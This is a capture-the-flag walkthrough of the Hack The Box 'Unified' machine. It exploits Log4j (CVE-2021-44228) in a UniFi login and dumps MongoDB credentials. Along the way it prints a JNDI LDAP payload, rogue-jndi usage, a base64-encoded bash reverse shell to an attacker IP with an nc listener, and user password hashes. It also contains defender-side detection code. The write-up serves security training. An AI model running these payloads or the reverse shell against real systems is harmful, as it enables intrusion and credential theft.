https://app.hackthebox.com/machines/Unified/



Unified | Walkthrough


Reconnaissance

Use nmap to enumerate the open ports on the target

nmap -sC -sV <MACHINE-IP>
# or sudo nmap -sS <MACHINE-IP>
port scanning
nopedawn@npdn ~/L/H/S/Unified> nmap -sC -sV 10.129.51.77
Starting Nmap 7.80 ( https://nmap.org ) at 2026-03-25 10:06 WIB
Nmap scan report for 10.129.51.77
Host is up (0.52s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
6789/tcp open  ibm-db2-admin?
8080/tcp open  http-proxy
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 431
|     Date: Wed, 25 Mar 2026 03:08:00 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 404
|     Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404
|     Found</h1></body></html>
|   GetRequest:
|     HTTP/1.1 302
|     Location: http://localhost:8080/manage
|     Content-Length: 0
|     Date: Wed, 25 Mar 2026 03:07:55 GMT
|     Connection: close
|   HTTPOptions:
|     HTTP/1.1 302
|     Location: http://localhost:8080/manage
|     Content-Length: 0
|     Date: Wed, 25 Mar 2026 03:07:57 GMT
|     Connection: close
|   RTSPRequest:
|     HTTP/1.1 400
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Wed, 25 Mar 2026 03:07:59 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|     Request</h1></body></html>
|   Socks5:
|     HTTP/1.1 400
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Wed, 25 Mar 2026 03:08:02 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_    Request</h1></body></html>
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Did not follow redirect to https://10.129.51.77:8443/manage
8443/tcp open  ssl/nagios-nsca Nagios NSCA
| http-title: UniFi Network
|_Requested resource was /manage/account/login?redirect=%2Fmanage
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US
| Subject Alternative Name: DNS:UniFi
| Not valid before: 2021-12-30T21:37:24
|_Not valid after:  2024-04-03T21:37:24
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 264.77 seconds
scan port only
nopedawn@npdn ~/L/H/S/Unified> sudo nmap -sS 10.129.51.77
[sudo] password for nopedawn:
Starting Nmap 7.80 ( https://nmap.org ) at 2026-03-25 10:13 WIB
Nmap scan report for 10.129.51.77
Host is up (0.45s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
6789/tcp open  ibm-db2-admin
8080/tcp open  http-proxy
8443/tcp open  https-alt

Nmap done: 1 IP address (1 host up) scanned in 3.69 seconds

The port scan shows that the target is a Linux machine with four open TCP services

  • 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
  • 6789/tcp open ibm-db2-admin?
  • 8080/tcp open http-proxy
  • 8443/tcp open ssl/nagios-nsca Nagios NSCA

Ports 8080 and 8443 returned a lot of output, and it looks like we are pentesting UniFi Network, version 6.4.54

From the task question, I’ve identified the vulnerability as CVE-2021-44228 (the Log4j vulnerability, which affects UniFi)

CVE-2021-44228 Detail
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

Let’s try to exploit it. This time I’ll follow the PoC from the article below

I’ll also use Burp Suite Community Edition as the interceptor and repeater

The initial request looks like this. Make sure to tick the “remember me” checkbox

Initial Header
POST /api/login HTTP/1.1
Host: 10.129.51.77:8443
Content-Length: 67
Sec-Ch-Ua-Platform: "Windows"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Sec-Ch-Ua: "Chromium";v="146", "Not-A.Brand";v="24", "Google Chrome";v="146"
Content-Type: application/json; charset=utf-8
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Origin: https://10.129.51.77:8443
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://10.129.51.77:8443/manage/account/login?redirect=%2Fmanage
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
Connection: keep-alive

{"username":"test","password":"test","remember":true,"strict":true}

Now we have to replace the value of the remember field with our payload. Make sure to change the address to your own VPN IP

intercept payload
{
  "username":"test",
  "password":"test",
  "remember":"${jndi:ldap://10.10.16.155:389/o=tomcat}",
  "strict":true
}
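A defender-side check for the request above, added here as an example (it is not part of the original walkthrough or of UniFi): it validates the field types of a login body and flags any string that carries a lookup expression, extracting the callback address for incident response. The schema is an assumption inferred from the benign request shown on this page, and the function names are hypothetical.

```python
import json
import re

# Field types inferred from the benign /api/login request shown on this page
# (an assumption of this example, not a published UniFi schema).
LOGIN_SCHEMA = {"username": str, "password": str, "remember": bool, "strict": bool}

# Any "${" lookup opener is suspicious in a login field; matching the opener
# rather than the word "jndi" also covers lookups nested inside other lookups.
LOOKUP_OPEN = re.compile(r"\$\{")

# A plain JNDI lookup: capture scheme, host and port as callback indicators.
JNDI_TARGET = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)


def walk_strings(value, path=""):
    """Yield (path, string) for every string nested in a decoded JSON value."""
    if isinstance(value, str):
        yield path, value
    elif isinstance(value, dict):
        for key, item in value.items():
            yield from walk_strings(item, f"{path}.{key}" if path else key)
    elif isinstance(value, list):
        for index, item in enumerate(value):
            yield from walk_strings(item, f"{path}[{index}]")


def inspect_login_body(raw):
    """Return a list of findings for one JSON login body (empty list = clean)."""
    try:
        body = json.loads(raw)
    except ValueError:
        return [{"field": None, "issue": "invalid-json"}]
    if not isinstance(body, dict):
        return [{"field": None, "issue": "not-an-object"}]

    findings = []
    # 1. Type check: the page's payload turns the boolean "remember" into a string.
    for field, expected in LOGIN_SCHEMA.items():
        if field in body and not isinstance(body[field], expected):
            findings.append({"field": field, "issue": "type-mismatch",
                             "expected": expected.__name__,
                             "got": type(body[field]).__name__})

    # 2. Content check: look for lookup expressions in every string value.
    for path, text in walk_strings(body):
        if not LOOKUP_OPEN.search(text):
            continue
        finding = {"field": path, "issue": "lookup-expression", "callback": None}
        target = JNDI_TARGET.search(text)
        if target:
            port = int(target["port"]) if target["port"] else None
            finding["callback"] = (target["scheme"].lower(), target["host"], port)
        findings.append(finding)
    return findings


# The two request bodies shown on this page: the original and the modified one.
BENIGN = '{"username":"test","password":"test","remember":true,"strict":true}'
MODIFIED = ('{"username":"test","password":"test",'
            '"remember":"${jndi:ldap://10.10.16.155:389/o=tomcat}","strict":true}')

if __name__ == "__main__":
    for name, raw in (("benign", BENIGN), ("modified", MODIFIED)):
        print(name, inspect_login_body(raw))
```

The type check alone rejects the modified request, which is why strict input validation in front of the logger is a useful layer even before Log4j itself is upgraded.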

Then I’ll capture the traffic on port 389 (the LDAP port) with tcpdump

Request:

tcpdump request
nopedawn@npdn ~/L/H/S/Unified> sudo tcpdump -i tun0 port 389
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes

And now, send it

Response:

tcpdump response
nopedawn@npdn ~/L/H/S/Unified> sudo tcpdump -i tun0 port 389
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
11:52:05.358816 IP unified.htb.50362 > 10.10.16.155.ldap: Flags [S], seq 1700860423, win 64240, options [mss 1335,sackOK,TS val 4134700970 ecr 0,nop,wscale 7], length 0
11:52:05.358885 IP 10.10.16.155.ldap > unified.htb.50362: Flags [R.], seq 0, ack 1700860424, win 0, length 0
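The same capture read from the defender's side, as an added example that is not part of the original walkthrough: a server that starts an LDAP connection to an unapproved host is a strong signal that a JNDI lookup was evaluated, and the bare SYN is enough even though the reply here was a reset. The function names, the approved-host set and the two extra log lines are assumptions constructed for this example.

```python
import re

# One line of default tcpdump text output for a TCP packet, as shown above.
PACKET = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) IP (?P<src>\S+) > (?P<dst>\S+): "
    r"Flags \[(?P<flags>[^\]]+)\]"
)

# tcpdump prints well-known ports by service name unless run with -n, so both
# spellings are listed. 1389 is the alternate LDAP port that appears on this page.
DIRECTORY_PORTS = {"389": 389, "ldap": 389, "636": 636, "ldaps": 636, "1389": 1389}


def split_endpoint(endpoint):
    """Split tcpdump's 'host.port' into (host, port); the port follows the last dot."""
    host, _, port = endpoint.rpartition(".")
    return host, port


def outbound_directory_syns(lines, servers, approved=frozenset()):
    """Flag connection attempts from monitored servers to LDAP ports on hosts
    outside the approved set. Only the initial SYN is needed: it proves the
    server tried to connect, whether or not anything answered."""
    alerts = []
    for line in lines:
        match = PACKET.match(line.strip())
        if not match or match["flags"] != "S":   # "S" alone = SYN without ACK
            continue
        src_host, _ = split_endpoint(match["src"])
        dst_host, dst_port = split_endpoint(match["dst"])
        if src_host not in servers or dst_port not in DIRECTORY_PORTS:
            continue
        if dst_host in approved:
            continue
        alerts.append({"time": match["ts"], "server": src_host,
                       "destination": dst_host, "port": DIRECTORY_PORTS[dst_port]})
    return alerts


CAPTURE = [
    # The two packets from the capture on this page.
    "11:52:05.358816 IP unified.htb.50362 > 10.10.16.155.ldap: Flags [S], "
    "seq 1700860423, win 64240, options [mss 1335,sackOK,TS val 4134700970 "
    "ecr 0,nop,wscale 7], length 0",
    "11:52:05.358885 IP 10.10.16.155.ldap > unified.htb.50362: Flags [R.], "
    "seq 0, ack 1700860424, win 0, length 0",
    # Constructed lines: an approved directory lookup and an inbound HTTPS request.
    "11:53:10.000001 IP unified.htb.50400 > dc01.corp.example.ldap: Flags [S], "
    "seq 1, win 64240, length 0",
    "11:53:11.000002 IP 192.0.2.50.51000 > unified.htb.8443: Flags [S], "
    "seq 2, win 64240, length 0",
]

if __name__ == "__main__":
    for alert in outbound_directory_syns(CAPTURE, {"unified.htb"},
                                         approved={"dc01.corp.example"}):
        print(alert)
```

An egress rule that blocks the controller from reaching LDAP ports outside the approved set would have stopped the lookup at this step.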

Next, the reverse shell

First, we need to install the requirements

install requirements
sudo apt-get install maven && \
git clone https://github.com/veracode-research/rogue-jndi && \
mv ~/.m2/settings.xml ~/.m2/settings.xml.bak && \
cd rogue-jndi && \
mvn package
check mvn version
nopedawn@npdn ~/L/H/S/Unified> mvn -v
Apache Maven 3.6.3
Maven home: /usr/share/maven
Java version: 22.0.2, vendor: Ubuntu, runtime: /usr/lib/jvm/java-22-openjdk-amd64
Default locale: en, platform encoding: UTF-8
OS name: "linux", version: "6.6.87.2-microsoft-standard-wsl2", arch: "amd64", family: "unix"

We have to build the payload and encode it as base64

encode payload to base64
nopedawn@npdn ~/L/H/S/Unified> echo -n 'bash -c bash -i >&/dev/tcp/10.10.16.155/4444 0>&1' | base64
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuMTU1LzQ0NDQgMD4mMQ==
run roguejndi
nopedawn@npdn ~/L/H/S/Unified> java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuMTU1LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" --hostname "10. 10.16.155"
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Starting HTTP server on 0.0.0.0:8000
Starting LDAP server on 0.0.0.0:1389
Mapping ldap://10. 10.16.155:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://10. 10.16.155:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://10. 10.16.155:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Mapping ldap://10. 10.16.155:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://10. 10.16.155:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
Mapping ldap://10. 10.16.155:1389/o=groovy to artsploit.controllers.Groovy
Mapping ldap://10. 10.16.155:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://10. 10.16.155:1389/o=reference to artsploit.controllers.RemoteReference

Set listener

set listener
C:\Users\npdn>nc -lnvp 4444
listening on [any] 4444 ...

The status lines below indicate that the payload was sent successfully

sending payload
nopedawn@npdn ~/L/H/S/Unified> java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuMTU1LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" --hostname "10. 10.16.155"
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
...
Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload
Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload

After sending the payload two or more times in Burp Suite Repeater, I finally got the shell

successfully gain shell
C:\Users\npdn>nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.16.155] from (UNKNOWN) [10.129.51.77] 57740
whoami
unifi
id
uid=999(unifi) gid=999(unifi) groups=999(unifi)

Foothold

The user flag is stored in /home/michael/user.txt

user flag
C:\Users\npdn>nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.16.155] from (UNKNOWN) [10.129.51.77] 57740
whoami
unifi
id
uid=999(unifi) gid=999(unifi) groups=999(unifi)
ls
bin
data
dl
lib
logs
run
webapps
work
find / -name user.txt 2>/dev/null
/home/michael/user.txt
cat /home/michael/user.txt
REDACTED

We need to stabilize our shell using bash

stabilize shell
script /dev/null -c bash
Script started, file is /dev/null
unifi@unified:/usr/lib/unifi$

From our task, we have to identify the port the MongoDB service is running on in the machine

see service running with ps aux
unifi@unified:/usr/lib/unifi$ ps aux | grep mongo
ps aux | grep mongo
unifi         67  0.2  4.1 1103744 85416 ?       Sl   03:05   0:21 bin/mongod --dbpath /usr/lib/unifi/data/db --port 27117 --unixSocketPrefix /usr/lib/unifi/run --logRotate reopen --logappend --logpath /usr/lib/unifi/logs/mongod.log --pidfilepath /usr/lib/unifi/run/mongod.pid --bind_ip 127.0.0.1
unifi       4183  0.0  0.0  11468  1072 pts/0    S+   05:34   0:00 grep mongo
unifi@unified:/usr/lib/unifi$

Let’s connect to that MongoDB service

mongo --port 27117
mongo connect
unifi@unified:/usr/lib/unifi$ mongo --port 27117
mongo --port 27117
MongoDB shell version v3.6.3
connecting to: mongodb://127.0.0.1:27117/
MongoDB server version: 3.6.3
Welcome to the MongoDB shell.
For interactive help, type "help".
For more comprehensive documentation, see
        http://docs.mongodb.org/
Questions? Try the support group
        http://groups.google.com/group/mongodb-user
2026-03-25T05:37:27.311+0000 I STORAGE  [main] In File::open(), ::open for '/home/unifi/.mongorc.js' failed with No such file or directory
Server has startup warnings:
2026-03-25T03:05:35.735+0000 I STORAGE  [initandlisten]
2026-03-25T03:05:35.735+0000 I STORAGE  [initandlisten] ** WARNING: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine
2026-03-25T03:05:35.735+0000 I STORAGE  [initandlisten] **          See http://dochub.mongodb.org/core/prodnotes-filesystem
2026-03-25T03:05:36.698+0000 I CONTROL  [initandlisten]
2026-03-25T03:05:36.698+0000 I CONTROL  [initandlisten] ** WARNING: Access control is not enabled for the database.
2026-03-25T03:05:36.698+0000 I CONTROL  [initandlisten] **          Read and write access to data and configuration is unrestricted.
2026-03-25T03:05:36.698+0000 I CONTROL  [initandlisten]
>
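The process line and the startup warning above point at the same weakness: mongod runs without access control, and binding to 127.0.0.1 does not protect it from a process that is already on the host. The audit below is an added example, not part of the original walkthrough; it reads a `ps aux` line and reports who can reach the database without credentials. The function names and result keys are hypothetical.

```python
import os
import shlex

LOOPBACK = {"127.0.0.1", "localhost", "::1"}


def parse_options(tokens):
    """Turn ['--port', '27117', '--logappend', ...] into {'port': '27117', ...}."""
    opts = {}
    i = 0
    while i < len(tokens):
        name, has_eq, value = tokens[i].lstrip("-").partition("=")
        if has_eq:
            opts[name] = value
        elif i + 1 < len(tokens) and not tokens[i + 1].startswith("-"):
            opts[name] = tokens[i + 1]
            i += 1
        else:
            opts[name] = True          # flag without a value
        i += 1
    return opts


def audit_mongod(ps_line):
    """Audit one `ps aux` line; returns None if it is not a mongod process."""
    fields = ps_line.split(None, 10)   # 10 fixed columns, then the command
    if len(fields) < 11:
        return None
    tokens = shlex.split(fields[10])
    if os.path.basename(tokens[0]) != "mongod":
        return None
    opts = parse_options(tokens[1:])

    if "auth" in opts or "keyFile" in opts:      # --keyFile implies --auth
        auth = True
    elif "config" in opts or "f" in opts:        # setting may live in the file
        auth = None
    else:
        auth = False

    # MongoDB 3.6 and later bind to localhost when --bind_ip is not given.
    binds = set(str(opts.get("bind_ip", "127.0.0.1")).split(","))
    network = "bind_ip_all" in opts or not binds <= LOOPBACK
    exposure = "network" if network else "loopback"

    if auth is False:
        reach = "network clients" if network else "local processes"
    elif auth is None:
        reach = "unknown"
    else:
        reach = None
    return {"user": fields[0], "port": int(opts.get("port", 27017)),
            "auth": auth, "exposure": exposure, "unauthenticated_reach": reach}


# The two lines of `ps aux | grep mongo` output shown on this page.
PS_LINES = [
    "unifi         67  0.2  4.1 1103744 85416 ?       Sl   03:05   0:21 "
    "bin/mongod --dbpath /usr/lib/unifi/data/db --port 27117 "
    "--unixSocketPrefix /usr/lib/unifi/run --logRotate reopen --logappend "
    "--logpath /usr/lib/unifi/logs/mongod.log "
    "--pidfilepath /usr/lib/unifi/run/mongod.pid --bind_ip 127.0.0.1",
    "unifi       4183  0.0  0.0  11468  1072 pts/0    S+   05:34   0:00 grep mongo",
]

if __name__ == "__main__":
    for line in PS_LINES:
        print(audit_mongod(line))
```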

Show all databases

show all databases
> show databases
shshow databases
ace       0.002GB
ace_stat  0.000GB
admin     0.000GB
config    0.000GB
local     0.000GB
>

Three of these are MongoDB default databases, and the other two belong to UniFi Network

Let’s enumerate all users within the database

db.admin.find()
db admin find
> use ace
ususe ace
switched to db ace
> db.version()
dbdb.version()
3.6.3
> db.admin.find()
dbdb.admin.find()
{ "_id" : ObjectId("61ce278f46e0fb0012d47ee4"), "name" : "administrator", "email" : "administrator@unified.htb", "x_shadow" : "$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.", "time_created" : NumberLong(1640900495), "last_site_name" : "default", "ui_settings" : { "neverCheckForUpdate" : true, "statisticsPrefferedTZ" : "SITE", "statisticsPreferBps" : "", "tables" : { "device" : { "sortBy" : "type", "isAscending" : true, "initialColumns" : [ "type", "deviceName", "status", "connection", "network", "ipAddress", "experience", "firmwareStatus", "downlink", "uplink", "dailyUsage" ], "columns" : [ "type", "deviceName", "status", "macAddress", "model", "ipAddress", "connection", "network", "experience", "firmwareStatus", "firmwareVersion", "memoryUsage", "cpuUsage", "loadAverage", "utilization", "clients", "lastSeen", "downlink", "uplink", "dailyUsage", "uptime", "wlan2g", "wlan5g", "radio2g", "radio5g", "clients2g", "clients5g", "bssid", "tx", "rx", "tx2g", "tx5g", "channel", "channel2g", "channel5g" ] }, "client" : { "sortBy" : "physicalName", "isAscending" : true, "initialColumns" : [ "status", "clientName", "physicalName", "connection", "ip", "experience", "Downlink", "Uplink", "dailyUsage" ], "columns" : [ "status", "clientName", "mac", "physicalName", "connection", "network", "interface", "wifi_band", "ip", "experience", "Downlink", "Uplink", "dailyUsage", "uptime", "channel", "Uplink_apPort", "signal", "txRate", "rxRate", "first_seen", "last_seen", "rx_packets", "tx_packets" ], "filters" : { "status" : { "active" : true }, "connection_type" : { "ng" : true, "na" : true, "wired" : true, "vpn" : true }, "clients_type" : { "users" : true, "guests" : true }, "device" : { "device" : "" } } }, "unifiDevice" : { "sortBy" : "type", "isAscending" : true, "columns" : [ "type", "name", "status", "macAddress", "model", "ipAddress", "connection", "network", "experience", "firmwareStatus", "firmwareVersion", "memoryUsage", 
"cpuUsage", "loadAverage", "utilization", "clients", "dailyUsage", "lastSeen", "downlink", "uplink", "uptime", "wlan2g", "wlan5g", "radio2g", "radio5g", "clients2g", "clients5g", "bssid", "tx", "rx", "tx2g", "tx5g", "channel", "channel2g", "channel5g" ], "initialColumns" : [ "type", "name", "status", "connection", "network", "ipAddress", "experience", "firmwareStatus", "downlink", "uplink", "dailyUsage" ] }, "unifiDeviceNetwork" : { "sortBy" : "type", "isAscending" : true, "columns" : [ "type", "name", "status", "macAddress", "model", "ipAddress", "connection", "network", "experience", "firmwareStatus", "firmwareVersion", "memoryUsage", "cpuUsage", "loadAverage", "utilization", "clients", "dailyUsage", "lastSeen", "downlink", "uplink", "uptime", "wlan2g", "wlan5g", "radio2g", "radio5g", "clients2g", "clients5g", "bssid", "tx", "rx", "tx2g", "tx5g", "channel", "channel2g", "channel5g" ], "initialColumns" : [ "type", "name", "status", "connection", "network", "ipAddress", "experience", "firmwareStatus", "downlink", "uplink", "dailyUsage" ] }, "unifiDeviceAccess" : { "sortBy" : "type", "isAscending" : true, "columns" : [ "type", "name", "status", "macAddress", "model", "ipAddress", "connection", "network", "experience", "firmwareStatus", "firmwareVersion", "memoryUsage", "cpuUsage", "loadAverage", "utilization", "clients", "dailyUsage", "lastSeen", "downlink", "uplink", "uptime", "wlan2g", "wlan5g", "radio2g", "radio5g", "clients2g", "clients5g", "bssid", "tx", "rx", "tx2g", "tx5g", "channel", "channel2g", "channel5g" ], "initialColumns" : [ "type", "name", "status", "connection", "network", "ipAddress", "experience", "firmwareStatus", "downlink", "uplink", "dailyUsage" ] }, "unifiDeviceProtect" : { "sortBy" : "type", "isAscending" : true, "columns" : [ "type", "name", "status", "macAddress", "model", "ipAddress", "connection", "network", "experience", "firmwareStatus", "firmwareVersion", "memoryUsage", "cpuUsage", "loadAverage", "utilization", "clients", 
"dailyUsage", "lastSeen", "downlink", "uplink", "uptime", "wlan2g", "wlan5g", "radio2g", "radio5g", "clients2g", "clients5g", "bssid", "tx", "rx", "tx2g", "tx5g", "channel", "channel2g", "channel5g" ], "initialColumns" : [ "type", "name", "status", "connection", "network", "ipAddress", "experience", "firmwareStatus", "downlink", "uplink", "dailyUsage" ] }, "unifiDeviceTalk" : { "sortBy" : "type", "isAscending" : true, "columns" : [ "type", "name", "status", "macAddress", "model", "ipAddress", "connection", "network", "experience", "firmwareStatus", "firmwareVersion", "memoryUsage", "cpuUsage", "loadAverage", "utilization", "clients", "dailyUsage", "lastSeen", "downlink", "uplink", "uptime", "wlan2g", "wlan5g", "radio2g", "radio5g", "clients2g", "clients5g", "bssid", "tx", "rx", "tx2g", "tx5g", "channel", "channel2g", "channel5g" ], "initialColumns" : [ "type", "name", "status", "connection", "network", "ipAddress", "experience", "firmwareStatus", "downlink", "uplink", "dailyUsage" ] }, "insights/wifiScanner" : { "sortBy" : "apCount", "isAscending" : false, "initialColumns" : [ "apCount", "essid", "bssid", "security", "radio", "signal", "channel", "band", "bw", "oui", "date", "ap_mac" ], "columns" : [ "apCount", "essid", "bssid", "security", "radio", "signal", "channel", "band", "bw", "oui", "date", "ap_mac" ] }, "insights/wifiMan" : { "sortBy" : "date", "isAscending" : false, "initialColumns" : [ "clinet_name", "client_wifi_experience", "device_model", "device_name", "wlan_essid", "client_signal", "wlan_channel_width", "down", "up", "endPoint", "rate", "date" ], "columns" : [ "clinet_name", "client_wifi_experience", "device_model", "device_name", "wlan_essid", "client_signal", "wlan_channel_width", "down", "up", "endPoint", "rate", "date" ] } }, "topologyViewSettings" : { "showAllDevices" : true, "showAllClients" : true, "show2GClients" : true, "show5GClients" : true, "showWiredClients" : true, "showSSID" : false, "showWifiExperience" : true, "showRadioChannel" : 
false, "showWifiStandards" : false, "showWiredSpeed" : false, "showWiredPorts" : false, "online" : true, "offline" : true, "isolated" : true, "pending_adoption" : true, "managed_by_another_console" : true }, "preferences" : { "alertsPosition" : "top_right", "allowHiddenDashboardModules" : false, "browserLogLevel" : "INFO", "bypassAutoFindDevices" : false, "bypassConfirmAdoptAndUpgrade" : false, "bypassConfirmBlock" : false, "bypassConfirmRestart" : false, "bypassConfirmUpgrade" : false, "bypassHybridDashboardNotice" : false, "bypassDashboardUdmProAd" : false, "bypassHybridSettingsNotice" : false, "dateFormat" : "MMM DD YYYY", "dismissWlanOverrides" : false, "enableNewUI" : false, "hideV3SettingsIntro" : true, "isAppDark" : true, "isPropertyPanelFixed" : true, "isRegularGraphForAirViewEnabled" : false, "isResponsive" : false, "isSettingsDark" : true, "isUndockedByDefault" : false, "noWhatsNew" : false, "propertyPanelCollapse" : false, "propertyPanelMultiMode" : true, "refreshButtonEnabled" : false, "refreshRate" : "2MIN", "refreshRateRememberAll" : false, "rowsPerPage" : 50, "showAllPanelActions" : false, "showWifimanAppsBanner" : true, "timeFormat" : "H:mm", "use24HourTime" : true, "useBrowserTheme" : false, "useSettingsPanelView" : false, "websocketEnabled" : true, "withStickyTableActions" : true, "isUlteModalClosed" : false, "isUbbAlignmentToolModalClosed" : false, "offlineClientTimeframe" : 24 }, "preferredLanguage" : "en", "dashboardConfig" : { "lastActiveDashboardId" : "61ce269d46e0fb0012d47ec6" } }, "requires_new_password" : false, "email_alert_enabled" : true, "email_alert_grouping_enabled" : true, "html_email_enabled" : true, "is_professional_installer" : false, "push_alert_enabled" : true }
{ "_id" : ObjectId("61ce4a63fbce5e00116f424f"), "email" : "michael@unified.htb", "name" : "michael", "x_shadow" : "$6$spHwHYVF$mF/VQrMNGSau0IP7LjqQMfF5VjZBph6VUf4clW3SULqBjDNQwW.BlIqsafYbLWmKRhfWTiZLjhSP.D/M1h5yJ0", "requires_new_password" : false, "time_created" : NumberLong(1640909411), "last_site_name" : "default", "email_alert_enabled" : false, "email_alert_grouping_enabled" : false, "email_alert_grouping_delay" : 60, "push_alert_enabled" : false }
{ "_id" : ObjectId("61ce4ce8fbce5e00116f4251"), "email" : "seamus@unified.htb", "name" : "Seamus", "x_shadow" : "$6$NT.hcX..$aFei35dMy7Ddn.O.UFybjrAaRR5UfzzChhIeCs0lp1mmXhVHol6feKv4hj8LaGe0dTiyvq1tmA.j9.kfDP.xC.", "requires_new_password" : true, "time_created" : NumberLong(1640910056), "last_site_name" : "default" }
{ "_id" : ObjectId("61ce4d27fbce5e00116f4252"), "email" : "warren@unified.htb", "name" : "warren", "x_shadow" : "$6$DDOzp/8g$VXE2i.FgQSRJvTu.8G4jtxhJ8gm22FuCoQbAhhyLFCMcwX95ybr4dCJR/Otas100PZA9fHWgTpWYzth5KcaCZ.", "requires_new_password" : true, "time_created" : NumberLong(1640910119), "last_site_name" : "default" }
{ "_id" : ObjectId("61ce4d51fbce5e00116f4253"), "email" : "james@unfiied.htb", "name" : "james", "x_shadow" : "$6$ON/tM.23$cp3j11TkOCDVdy/DzOtpEbRC5mqbi1PPUM6N4ao3Bog8rO.ZGqn6Xysm3v0bKtyclltYmYvbXLhNybGyjvAey1", "requires_new_password" : false, "time_created" : NumberLong(1640910161), "last_site_name" : "default" }
>

To get cleaner output, use

mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"

The function we use to update users within the database is

db.admin.update()
update admin db
> db.admin.update()
dbdb.admin.update()
2026-03-25T05:52:59.133+0000 E QUERY    [thread1] Error: need a query :
DBCollection.prototype._parseUpdate@src/mongo/shell/collection.js:441:1
DBCollection.prototype.update@src/mongo/shell/collection.js:483:18
@(shell):1:1
>

From the previous db.admin.find() output, we need to go after the root user’s password

